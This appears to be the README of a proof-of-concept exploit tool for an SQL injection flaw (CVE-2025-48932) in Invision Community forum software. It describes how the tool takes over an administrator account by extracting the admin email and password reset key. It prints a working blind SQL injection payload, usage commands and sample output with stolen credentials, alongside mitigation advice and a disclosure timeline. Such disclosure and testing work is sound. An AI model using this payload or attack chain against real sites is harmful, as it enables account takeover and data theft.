# Invision Community SQL Injection Exploit (CVE-2025-48932)

[![Python Version](https://img.shields.io/badge/python-3.7+-blue.svg)](https://www.python.org/downloads/)
[![License](https://img.shields.io/badge/license-MIT-green.svg)](LICENSE)
[![CVE](https://img.shields.io/badge/CVE-2025--48932-red.svg)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48932)

A proof-of-concept exploit demonstrating a SQL injection vulnerability in Invision Community versions <= 4.7.20.

## ⚠️ Disclaimer

**This tool is provided for educational and authorized security testing purposes ONLY.**

- Unauthorized access to computer systems is **ILLEGAL**
- Only use this tool on systems you own or have explicit written permission to test
- The author is **NOT RESPONSIBLE** for any misuse or damage caused by this tool
- This is for security researchers, penetration testers, and educational purposes only

## 📋 Table of Contents

- [Vulnerability Description](#vulnerability-description)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [How It Works](#how-it-works)
- [Mitigation](#mitigation)
- [Credits](#credits)
- [References](#references)

## 🔍 Vulnerability Description

**CVE ID:** CVE-2025-48932  
**Severity:** High  
**CVSS Score:** TBD  
**Affected Versions:** Invision Community 4.x versions before 4.7.21

The vulnerability exists in the `/applications/calendar/modules/front/calendar/view.php` script. User input passed through the `location` request parameter in the `IPS\calendar\modules\front\calendar\view::search()` method is not properly sanitized before being used in SQL queries.

This allows remote, unauthenticated attackers to:
- Extract sensitive data from the database
- Read admin credentials
- Potentially achieve admin account takeover

**Prerequisites for exploitation:**
- Calendar application must be installed
- GeoLocation feature (like Google Maps) must be configured

**Note:** While SQL injection vulnerabilities in Invision Community 4.x versions < 4.7.18 could lead to admin account takeover and RCE by resetting the admin password, version 4.7.18 introduced a new security encryption key in the password reset mechanism, making this attack vector more difficult.

## 📦 Requirements

- Python 3.7 or higher
- pip (Python package manager)
- Internet connection
- Target system running Invision Community <= 4.7.20 with:
  - Calendar application installed
  - GeoLocation feature configured

## 🚀 Installation

1. **Clone the repository:**
   ```bash
   git clone https://github.com/yourusername/invision-sqli-exploit.git
   cd invision-sqli-exploit
   ```

2. **Install dependencies:**
   ```bash
   pip install -r requirements.txt
   ```

## 💻 Usage

### Basic Usage

```bash
python invision-sqli-exploit.py -u http://target.com/forum/
```

### Verbose Mode (for debugging)

```bash
python invision-sqli-exploit.py -u https://example.com/community/ -v
```

### Command-Line Arguments

| Argument | Description | Required |
|----------|-------------|----------|
| `-u`, `--url` | Target Invision Community base URL | Yes |
| `-v`, `--verbose` | Enable verbose output for debugging | No |
| `-h`, `--help` | Show help message and exit | No |

### Example Output

```
==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Target: http://example.com/forum/
==================================================

[*] Fetching CSRF token...
[+] CSRF token found: abc123def456...
[*] Step 1: Extracting admin email address...
[*] Extracting data: admin@example.com
[+] Admin email: admin@example.com

[!] Step 2: Manual action required!

Please follow these steps:
1. Navigate to: http://example.com/forum/index.php?/lostpassword/
2. Request a password reset using email: admin@example.com
3. Press ENTER when done...

[*] Step 3: Extracting password reset validation key...
[*] Extracting data: xyz789abc123...
[+] Reset key: xyz789abc123...
[*] Step 4: Resetting admin password...

==================================================
[+] EXPLOITATION SUCCESSFUL!
==================================================

Admin credentials:
  Email:    admin@example.com
  Password: Pwned1721234567

You can now login at: http://example.com/forum/index.php?/login/
```

## 🔬 How It Works

The exploit works in four main steps:

### 1. CSRF Token Extraction
The script first fetches a CSRF token from the target website, which is required for subsequent requests.

### 2. Boolean-Based Blind SQL Injection
Using a binary search algorithm, the exploit extracts data character by character from the database:
- Tests each character using conditional SQL queries
- Uses the `RLIKE` function with regex patterns to detect true/false conditions
- Error messages indicate successful conditions

### 3. Admin Email Extraction
Queries the `core_members` table to extract the administrator's email address.

### 4. Password Reset Exploitation
- The attacker manually initiates a password reset for the admin account
- The exploit extracts the password reset validation key from the database
- Uses the validation key to reset the admin password without email access

### Technical Details

**Injection Point:**
```php
location parameter → calendar/view.php → search() method
```

**Payload Example:**
```sql
'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#
```

**Exploitation Technique:** Boolean-based blind SQL injection using binary search for efficient data extraction.

## 🛡️ Mitigation

### For Users

**Immediate Actions:**
1. **Upgrade to version 4.7.21 or later** - This version patches the vulnerability
2. **Disable the Calendar application** if not in use
3. **Monitor access logs** for suspicious activity
4. **Review admin accounts** for unauthorized access

### For Developers

**Secure Coding Practices:**
1. **Use parameterized queries/prepared statements** - Never concatenate user input into SQL queries
2. **Input validation** - Validate and sanitize all user inputs
3. **Least privilege principle** - Database users should have minimal required permissions
4. **Web Application Firewall (WAF)** - Deploy WAF rules to detect SQL injection attempts
5. **Regular security audits** - Conduct periodic code reviews and penetration tests

**Example of Secure Code:**
```php
// Vulnerable code
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// Secure code
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);
```

## 📅 Disclosure Timeline

| Date | Event |
|------|-------|
| May 16, 2025 | Vendor notified |
| May 27, 2025 | Version 4.7.21 released |
| May 28, 2025 | CVE identifier requested |
| May 28, 2025 | CVE-2025-48932 assigned |
| July 23, 2025 | Public disclosure |

## 👏 Credits

**Developer:**
- **nanda**

**Note:** This is an independent implementation based on publicly disclosed vulnerability information (CVE-2025-48932)

## 📚 References

- [CVE-2025-48932 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48932)
- [Invision Community Official Site](https://invisioncommunity.com)
- [EDB-ID: 52383](https://www.exploit-db.com/exploits/52383)

## 📝 License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## 🤝 Contributing

Contributions are welcome! Please feel free to submit a Pull Request. For major changes, please open an issue first to discuss what you would like to change.

## ⚖️ Legal Notice

This tool is distributed under the MIT License. By using this software, you agree to:

1. Use it only for **legal and authorized testing purposes**
2. Take **full responsibility** for your actions
3. Not hold the author liable for any **misuse or damage**
4. Comply with all **applicable laws and regulations**

**Remember:** Unauthorized access to computer systems is a crime in most jurisdictions and can result in severe legal consequences.

---

**If you discover a security vulnerability, please responsibly disclose it to the vendor before making it public.**
